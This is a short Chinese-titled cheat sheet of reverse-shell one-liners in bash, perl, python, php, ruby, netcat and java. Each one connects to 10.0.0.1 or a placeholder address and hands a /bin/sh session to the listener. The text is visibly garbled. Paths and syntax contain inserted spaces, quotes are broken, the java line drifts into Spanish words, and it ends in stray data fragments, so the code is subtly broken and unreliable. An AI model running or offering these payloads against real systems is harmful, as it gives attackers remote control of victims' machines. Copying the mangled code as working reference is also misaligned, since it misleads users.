反弹 shell 的 十种 姿势

bash 版本 ： bash -i > &/dev/tcp/10.0.0.1/8080 0 > &1 ， 注意 linux 不 perl 版本: perl -e 'use Socket; $ i = " 10.0.0.1 "; $ p = 1234; socket ( S, PF_INET, SOCK_STREAM, getprotobyname (" tcp ")) if (connect (S, sockaddr_in ($ p, inet_aton ($ i)))) {open (STDIN, " > &S "); open (STDOUT, > &S "); open (STDERR, > &S "); exec ("/bin /sh -i");}; python 版本 ： python -c 'import socket, subprocess, os; s = socket.socket (socket.AF_INET, socket.SOCK_STREAM); s.connect ((" 10.0.0.1 ", 1234)) os.dup2 ( s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p = subprocess.call ([/quot; /bin /sh "," -i "]); ' php 版本 ： php -r '$ sock = fsockopen (< 10.0.0.1 ", 1234); exec (" /bin /sh -i &3 > &3 2 > &3 "); ruby ： ： ruby ​​-rsocket -e'f = TCPSocket.open ("10.0.0.1", 1234) .to_i; exec sprintf ("/bin /sh -i < &% d > &% d 2 > &% d ", f, f, f) 'nc 版本 ： nc -e /bin /sh 10.0.0.1 1234 rm /tmp /f; mkfifo /tmp /f; cat /tmp /f | /bin /sh -i 2 > &1 | nc 10.0.0.1 1234 > /tmp /f nc x.x.x.x 8888 | /bin /sh | nc xxxx 9999 java 版本 r = Runtime.getRuntime () p = r.exec ([/quot; /bin /bash ”, " -c ", " exec 5 < > /dev/tcp/10.0.0.1/2002; cat < &5 |  mientras lee la linea; do \\ $ line 2 > &5 > &5; hecho "] como String []) p.waitFor ()
en"],null,[0.67265618],en"]]]